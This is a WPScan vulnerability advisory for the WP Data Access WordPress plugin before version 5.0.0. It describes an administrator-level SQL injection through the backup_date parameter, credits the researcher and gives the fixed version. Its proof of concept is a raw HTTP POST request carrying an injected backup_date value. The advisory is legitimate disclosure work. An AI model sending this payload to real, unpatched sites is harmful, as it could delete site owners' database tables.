WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Data Access < 5.0.0 - Admin+ SQL Injection

Description

The plugin does not properly sanitise and escape the backup_date parameter before using it a SQL statement, leading to a SQL injection issue and could allow arbitrary table deletion

Proof of Concept

POST /wp-admin/admin.php?page=wpdataaccess&tab=repository HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

remove_one_backup=true&_wpnonce=a5df98f178&backup_date=`,`xxx.xxx

Affects Plugins

wp-data-access
Fixed in version 5.0.0

References

CVE
CVE-2021-24866

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of Wuhan University

Submitter

ZhongFu Su(JrXnm) of Wuhan University

Submitter website
https://blog.szfszf.top
Verified

Yes

WPVDB ID
a9073616-ffd6-4956-b2e7-0fb2eac6e9b5

Timeline

Publicly Published

2021-11-08 (about 1 years ago)

Added

2021-11-08 (about 1 years ago)

Last Updated

2022-09-26 (about 12 months ago)

Our Other Services

WPScan WordPress Security Plugin